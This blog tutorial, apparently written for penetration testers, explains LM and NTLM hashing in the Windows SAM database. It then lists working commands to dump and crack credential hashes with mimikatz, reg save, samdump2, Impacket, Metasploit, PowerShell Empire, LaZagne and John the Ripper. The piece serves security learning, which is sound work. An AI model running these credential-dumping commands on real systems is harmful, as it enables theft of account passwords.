In this article, were learn how passwords are
stored in windows and out of the methods used to hash passwords in SAM, we will
focus on LM and NTLM authentications. And then we learn how to dump these
credential hashes from SAM.
Table of content
·
Introduction
to SAM
·
How
passwords are stored?
o
LM
Authentication
o
NTLM
Authentication
·
PwDump7
·
SamDump2
·
Impacket
·
Metasploit
Framework
o
HashDump
o
Credential_collector
o
Load_kiwi
o
Invoke-PowerDump.ps1
o
Get-PassHashes.ps1
·
Kodiac
·
PowerShell
Empire
o
Mimikatz/sam
o
Credential/powerdump
·
Powershell
·
LaZagne
·
Decrypting
hash: John The Ripper
Introduction to SAM
SAM is short for Security Account manager which
manages all the user accounts and their passwords. It acts as a database. All
the passwords are hashed and then stored SAM. It is the responsibility of LSA
(Local Security Authority) to verify user login by matching the passwords with the
database maintained in SAM. SAM starts running in the background as soon as the
windows startup. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM can finding registry,
just go to the registry and navigate yourself to HKEY_LOCAL_MACHINE\SAM
How are Passwords stored in Windows?
To know how passwords are saved in windows, we
will first need to understand what are LM, NTLM v1 & v2, Kerberos.
LM authentication
LAN Manager (LM) authentication was developed
by IBM for Microsoft's Windows Operating Systems. The security it provides is
considered hackable today. It converts your password into a hash by breaking it
in two chunks of seven characters. And then further encrypting each chunk. It
is not case sensitive either, which is a huge drawback. As this method coverts
the whole thing into uppercase, so when the attacker is applying any attack
like brute force or dictionary; they can altogether avoid the possibility of
lowercase. The key it is using to encrypt is 56-bit DES which now can be easily
hacked.
NTLM authentication
NTLM authentication was developed to secure
your systems as LM proved to be insecure in time. NTLM's base is a challenge-response
mechanism. It uses three components - nonce (challenge), response and
authentication.
When any password is stored in windows, NTLM
starts working by encrypting the password and the storing the hash of the said
password while it disposes of the actual password. And it further sends the
username to the server, then the server creates a 16-byte numeric string, which
is random, namely nonce and sends it to the client. Now, the client will
encrypt the nonce using the hash string of the password and send the result
back to the server. This process is called a response. These three components
(nonce, username and response) will be sent to Domain Controller. The Domain
Controller will recover the password using hash from the Security Account
Manager (SAM) database. Furthermore, the domain controller will check if the
nonce and response in case they match, Authentication turns out to be
successful.
Working of NTLM v1 and NTML v2 is same,
although there are few differences such as NTML v1 is MD4 and v2 is MD5 and in
v1 C/R Length is 56 bits + 56-bit +16 bit while v2 uses 128 bits. When it comes
to C/R Algorithm v1 uses DES (ECB mode) and v2 is HMAC_MD5. and lastly, in v1
C/R Value Length 64 bit + 64 bit + 64 bit and v2 uses 128 bits.
Now as we have understood these hashing systems, let's focus
on how to dump them. The methods we will focus on are best suited for both
internal and external pen-testing. Let’s begin!
Mimikatz
There is a good enough method to dump the hashes of SAM file
using mimikatz. The method is pretty easy and best suited for internal
penetration testing. In one of our previous article we have covered mimikatz,
to read that article click here. So
in this method we will use token::elevate
command. This command is responsible for allowing mimikatz to access SAM file
in order to dump hashes. Now, to use this method use the following set of
commands:
privilege::debug
token::elevate
lsadump::sam
PwDump7
This tool is developed by Tarasco and you can download it
from here. This tool
extracts the SAM file from the system and dumps its credentials. To execute
this tool just run the following command in command prompt after downloading:
PwDump7.exe
And as a result, it will dump all the hashes stored in SAM
file as shown in the image above.
Now, we will save the registry values of the SAM file and
system file in a file in the system by using the following commands:
reg save hklm\sam c:\sam
reg save hklm\system c:\system
We saved the values with the above command to retrieve the
data from the SAM file.
SamDump2
Once you have retrieved the data from SAM, you can use
SamDump2 tool to dump its hashes with the following command:
samdump2 system sam
Impacket
Impacket tool can also extract all the hashes for you from
the SAM file with the following command:
./secretsdump.py -sam /root/Desktop/sam -system
/root/Desktop/system LOCAL
Metasploit Framework: HashDump
When you have a meterpreter session of a target, just run hashdump
command and it will dump all the hashes from SAM file of the target system. The
same is shown in the image below:
Another way to dump hashes through hashdump module is through a post exploit that Metasploit offers. To use the said exploit, use the following set of commands:
use
post/windows/gather/hashdump
set session 1
exploit
Metasploit Framework: credential_collector
Another way to dump credentials by using Metasploit is via
another in-built post exploit. To use this exploit, simply background your
session and run the following command:
use
post/windows/gather/credential/credential_collector
set session 1
exploit
Metasploit Framework: load kiwi
The next method that Metasploit offers are by firing up the
mimikatz module. To load mimikatz, use the load kiwi command and then
use the following command to dump the whole SAM file using mimikatz.
lsa_dump_sam
Hence, you have your passwords as you can see in the image
above.
Metasploit Framework: Invoke-Powerdump.ps1
The method of Metasploit involves PowerShell. After getting
the meterpreter session, access windows PowerShell by using the command load
PowerShell. And then use the following set of commands to run the
Invoke-PowerDump.ps1 script.
powershell_import /root/Invoke-PowerDeump.ps1
powershell_execute Invoke-PowerDump.ps1
Once the above commands execute the script, you will have the dumped passwords just as in the image above.
Metasploit Framework: Get-PassHashes.ps1
Again, via meterpreter, access the windows PowerShell using
the command load PowerShell. And the just like in the previous method, use the
following commands to execute the scripts to retrieve the passwords.
powershell_import GetHashes.ps1
powershell_execute Get-PassHashes.ps1
And VOILA! All the passwords have been retrieved.
Kodiac
Once you have the session by Kodiac C2, use the hashdump_sam
module to get passwords as shown below:
use hashdump_sam
execute
All the hashes from the SAM file will be dumped as shown in the above image.
Powershell Empire: mimikatz/sam
Once you have the session through the empire, interact with
the session and use the mimikatz/sam module to dump the credentials with help
of following commands:
usemodule credentials/mimikatz/sam
execute
This exploit will run mimikatz and will get you all the
passwords you desire by dumping SAM file.
Powershell Empire: credentials/powerdump
Empire offers us with yet another exploit that dumps the
credentials from the victim’s system. This module does not invoke mimikatz like
the previous method. To uses this exploit, type:
usemodule credentials.powerdump
execute
Yes!! You will have the hashes.
PowerShell
This method is an excellent one for local testing, AKA
internal testing. To use this method, simply type the following in the Powershell:
Import-Module <’path of the powerdump script’>
Invoke PowerDump
And, it will dump all the credentials for you.
LaZAgne
LaZage is an amazing tool for dumping all kinds of
passwords. We have dedicatedly covered LaZagne in our previous article. To
visit the said article, click here.
Now, to dump SAM hashes with LaZagne, just use the following command:
lazagne.exe all
Yay!!! All the credentials have been dumped.
Decrypting Hash: John The Ripper
John The Ripper is an amazing hash cracking tool. We have
dedicated two articles on this tool. To learn more about John The Ripper, click
here – part
1, part
2. Once you have dumped all the hashes from SAM file by using any of
method given above, then you just need John The Ripper tool to crack the hashes
by using the following command:
john –format=NT hash –show
And as you can see, it will reveal the password by cracking
the given hash.
The article focuses on dumping credentials from windows SAM
file. Various methods have been shown using multiple platforms to successfully
dump the credentials. To secure yourself you first must learn how a
vulnerability can be exploited and to what extent. Therefore, such knowing such
methods and what they can do is important.
0 comments:
Post a Comment